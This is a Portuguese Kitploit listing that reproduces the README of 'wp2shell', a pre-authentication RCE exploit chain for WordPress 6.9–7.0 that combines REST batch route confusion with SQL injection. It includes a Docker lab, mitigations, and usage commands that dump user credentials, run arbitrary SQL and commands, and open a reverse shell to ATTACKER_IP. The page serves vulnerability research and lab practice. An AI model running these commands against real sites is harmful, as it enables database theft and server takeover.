Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-63030-CVE-2026-60137 — Exploit de RCE pré-authentification para WordPress (CVE-2026-63030 + CVE-2026-60137) encadeando confusão de rotas e injeção de SQL para acesso total ao shell. Inclui laboratório Docker para testes seguros. | Kitploit
Ferramentas/GitHubGitHub/giangdurian/cve-2026-63030-cve-2026-60137
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubgiangdurian/cve-2026-63030-cve-2026-60137

CVE-2026-63030-CVE-2026-60137

Exploit de RCE pré-authentification para WordPress (CVE-2026-63030 + CVE-2026-60137) encadeando confusão de rotas e injeção de SQL para acesso total ao shell. Inclui laboratório Docker para testes seguros.

Ver Repositório
2há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-63030 & CVE-2026-60137 — wp2shell

RCE Pré-Auth no WordPress Core — Confusão de Rotas + Injeção de SQL encadeadas para Execução Remota de Código

CVECVE-2026-63030 + CVE-2026-60137
Aliaswp2shell
Tipo de VulnerabilidadeConfusão de Rotas na API REST → Injeção de SQL → RCE
SeveridadeCrítico — CVSS 10.0
AfetadosWordPress 6.9.0–6.9.4, 7.0.0–7.0.1
Corrigido emWordPress 6.8.6, 6.9.5, 7.0.2
Autenticação NecessáriaNenhuma (Pré-Auth)

Visão Geral

wp2shell é o nome dado à cadeia de exploração que combina 2 vulnerabilidades no WordPress Core:

  • CVE-2026-63030 — Confusão de Rotas: o endpoint batch (/wp-json/batch/v1) tem índice desalinhado entre os arrays $matches[] e $validation[] quando um sub-request tem path inválido, fazendo o sub-request seguinte ser executado sob um handler errado → bypass da validação de schema da REST API.
  • CVE-2026-60137 — Injeção de SQL: WP_Query::get_posts() não sanitiza o parâmetro author__not_in quando recebe uma string em vez de um array → injeção de SQL bruta.

Os dois bugs combinados formam uma cadeia completa de RCE Pré-Auth — de 0 credenciais a shell no servidor apenas via requisição HTTP.

Cadeia de Exploração

root@kitploit:~
Route Confusion (bypass REST validation)
    → SQL Injection (đọc DB: users, secret keys)
        → oEmbed cache poisoning (read-only SQLi → write primitive)
            → customize_changeset (tạo admin mới)
                → Plugin upload (webshell)
                    → Remote Code Execution

Leia a análise técnica completa em REPORT.md


Configuração do Laboratório

O laboratório usa Docker Compose com 3 containers:

ContainerImagePort
WordPress (vulnerável)wordpress:6.9.48080
MySQLmysql:8.0interno
phpMyAdminphpmyadmin:latest8081

Requisitos

  • Docker + Docker Compose
  • Python 3.8+ (somente stdlib, sem necessidade de instalar pacotes adicionais)
  • Bash (para executar setup.sh)

Inicialização

root@kitploit:~
cd wp2shell-lab
bash setup.sh

O script automaticamente:

  1. Faz pull das imagens e inicia os containers
  2. Instala o WordPress 6.9.4
  3. Popula dados de exemplo (posts, usuários)
  4. Ativa o general log do MySQL + WP_DEBUG

Quando concluído, exibirá "WP2Shell Lab — READY!" junto com as informações de login.

Limpeza

root@kitploit:~
cd wp2shell-lab
docker compose down -v

Uso do Exploit

root@kitploit:~
# Kiểm tra vulnerability
python3 exploit.py check http://TARGET:8080

# Kiểm tra + xác nhận SQLi
python3 exploit.py check --confirm-sqli http://TARGET:8080

# Đọc user credentials từ database
python3 exploit.py read --preset users http://TARGET:8080

# Chạy câu SQL tùy ý
python3 exploit.py read --query "SELECT @@version" http://TARGET:8080

# Full RCE — chạy command
python3 exploit.py shell --cmd "id" http://TARGET:8080

# Reverse shell
python3 exploit.py shell --reverse ATTACKER_IP:PORT http://TARGET:8080

O script PoC foi reescrito do zero, com referência a Icex0/wp2shell-poc. Usa apenas a stdlib do Python 3, sem necessidade de instalar dependências adicionais.


Condições de Exploração

CondiçãoRequisito
Versão do WordPress6.9.0–6.9.4 ou 7.0.0–7.0.1
Endpoint batch da REST APIAcessível (ativado por padrão)
AutenticaçãoNenhuma necessária
RedeAtacante alcança o WordPress

Mitigação

  1. Atualize o WordPress para >= 6.9.5 ou >= 7.0.2 — a única maneira definitiva.
  2. Desative o endpoint batch temporariamente: adicione add_filter('rest_batch_disabled', '__return_true'); ao functions.php.
  3. Regra de WAF: bloqueie requisições para /wp-json/batch/v1 que contenham palavras-chave de SQL.

Disclaimer

Este repositório foi criado para fins de pesquisa, aprendizado e CTF em ambiente de laboratório controlado. Não use para atacar sistemas reais. Qualquer exploração não autorizada é violação da lei.


Referências

  • Icex0/wp2shell-poc — PoC original de referência
  • WordPress 6.9.4 — class-wp-rest-server.php
  • WordPress 6.9.4 — class-wp-query.php
  • Patch diff 6.9.4 -> 6.9.5
Baixar ferramenta